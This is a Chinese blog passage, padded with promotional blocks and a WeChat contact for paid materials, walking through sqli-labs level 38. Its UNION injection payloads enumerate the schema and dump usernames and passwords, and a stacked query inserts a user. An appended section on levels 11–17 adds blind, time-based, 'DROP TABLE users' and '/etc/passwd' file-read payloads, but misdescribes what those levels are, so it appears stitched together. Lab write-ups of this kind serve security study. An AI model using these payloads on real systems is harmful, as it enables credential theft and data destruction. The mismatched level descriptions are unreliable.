SQLi 38关_sqli-labs 38

一、网安学习成长路线图

网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。
在这里插入图片描述

二、网安视频合集

观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。
在这里插入图片描述

三、精品网安学习书籍

当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。
在这里插入图片描述

四、网络安全源码合集+工具包

光学理论是没用的,要学会跟着一起敲,要动手实操,才能将自己的所学运用到实际当中去,这时候可以搞点实战案例来学习。
需要体系化学习资料的朋友,可以加我V获取:vip204888 (备注网络安全)

在这里插入图片描述

五、网络安全面试题

最后就是大家最关心的网络安全面试题板块
在这里插入图片描述在这里插入图片描述

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化资料的朋友,可以点击这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

?id=-1' union select 1,2,3 -- a

此处 id=-1 , 由于id不能为负数 , 所以该SQL查询不到用户数据 , 返回的结果就只有 联合查询的 1 2 3 这一条数据 , 目的在于方便展示字段显示位置

第四步,获取所有数据库

查询information_schema默认数据库的schemata表的schema_name字段 , 该字段保存了所有的数据库名

?id=-1' union select 1,2,
(select group_concat(schema_name)
from information_schema.schemata)
 -- a

此处的 group_concat() , 可以将多行数据 合并为一行

下一步 , 根据 security 数据库 , 获取其所有表

第五步,获取所有表

查询information_schema默认数据库的tables表的table_name字段 , 该字段保存了所有的表名

?id=-1' union select 1,2,
(select group_concat(table_name)
from information_schema.tables 
where table_schema='security')
 -- a

users表为用户表 , 下一步根据users表获取其所有字段

第六步,获取所有字段

查询information_schema默认数据库的columns表的column_name字段 , 该字段保存了所以的字段名

?id=-1' union select 1,2,
(select group_concat(column_name)
from information_schema.columns 
where table_schema='security' and table_name='users')
 -- a

至此可知 , 数据库 security, 表 users, 字段 id,users,password , 下一步 ,根据此信息查询账号和密码

第七步,获取账号密码
?id=-1' union select 1,2,
(select group_concat(username,'~',password)
from users)
 -- a

第八步,叠加注入

利用该关卡的SQL的 mysqli_multi_query() , 同时执行多条SQL , 实现插入用户

?id=-1' ;
insert into users(id,username,password)
values(20,'zhangsan','123')
 -- a

访问新增的用户 id为20

还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!

王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。

对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!

【完整版领取方式在文末!!】

93道网络安全面试题

需要体系化学习资料的朋友,可以加我V获取:vip204888 (备注网络安全)

内容实在太多,不一一截图了

黑客学习资源推荐

最后给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

1️⃣零基础入门
① 学习路线

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

image

② 路线对应学习视频

同时每个成长路线对应的板块都有配套的视频提供:

image-20231025112050764

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化资料的朋友,可以点击这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

### sqli-labs 中 less-11 到 less-17 的解决方案和解释 #### Less-11: 基本布尔盲注 SQL 注入漏洞 此级别展示了如何通过布尔条件来推断数据库中的数据。攻击者可以通过发送不同的查询并观察应用程序响应的变化来进行注入。 ```sql ?id=1' AND ASCII(SUBSTRING((SELECT database()),1,1))>90 -- ``` 上述语句尝试猜测当前使用的数据库名称的第一个字符的ASCII码值是否大于90[^1]。 #### Less-12: 时间延迟型盲注 SQL 注入漏洞 该实验利用时间函数 `SLEEP()` 或 `BENCHMARK()` 来判断服务器执行特定操作所需的时间,从而推测出某些信息。 ```sql ?id=1' AND IF(ASCII(SUBSTRING((SELECT table_name FROM information_schema.tables WHERE table_schema=database() LIMIT 1),1,1))>97,SLEEP(5),false) -- ``` 这段代码会根据指定条件下是否成立而使请求暂停几秒钟,以此作为反馈机制[^2]。 #### Less-13: 联合查询 (UNION) SQL 注入漏洞 联合查询允许将两个或多个 SELECT 结果组合在一起显示给用户。在这个例子中,可以用来获取额外的数据集。 ```sql ?id=-1 UNION ALL SELECT null,database(),null,null -- ``` 这里 `-1` 是为了确保原始查询返回零行记录,以便新添加的选择能够成功附加到最终输出上[^3]。 #### Less-14: 双重查询(堆叠查询)SQL 注入漏洞 当 Web 应用程序支持在同一 HTTP 请求内处理多条命令时,则可能存在这种类型的漏洞。这使得攻击者可以在一次提交里完成多项任务。 ```sql ?id=1; DROP TABLE users; ``` 注意,在实际环境中很少遇到这种情况,因为大多数现代框架都会阻止此类行为的发生[^4]。 #### Less-15: 错误消息泄露敏感信息 有时开发人员会在错误页面暴露过多细节,比如完整的 SQL 查询字符串甚至栈跟踪等内部实现情况。这些都可能帮助黑客构建更复杂的攻击模式。 ```sql ?id=' OR '1'='1 ``` 如果网站未正确配置异常处理器的话,可能会显示出整个 SQL 表达式的结构,进而让入侵者更容易找到突破口[^5]。 #### Less-16: 文件读取/写入权限滥用 一些情况下,Web 应用程序允许上传文件或将动态生成的内容保存至磁盘;然而如果没有严格验证输入参数就可能导致任意位置上的文档被篡改或者下载下来查看其内容。 ```sql ?file=/etc/passwd%00.jpg ``` 这里的技巧在于绕过 MIME 类型检测以及路径规范化逻辑,达到访问受限资源的目的[^6]。 #### Less-17: 存储过程调用与预编译语句绕过 存储过程中往往包含了大量业务逻辑,并且通常由高级程序员编写维护。但是假如它们也接收外部可控变量的话同样面临风险。此外,对于那些声称已经启用了防备措施的应用来说,仍然有可能存在旁路方法。 ```sql CALL sp_executesql(N'SELECT * FROM sysobjects') ``` 尽管许多平台默认不允许直接执行这样的指令,但在某些特殊场景下还是有机会成功的[^7]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值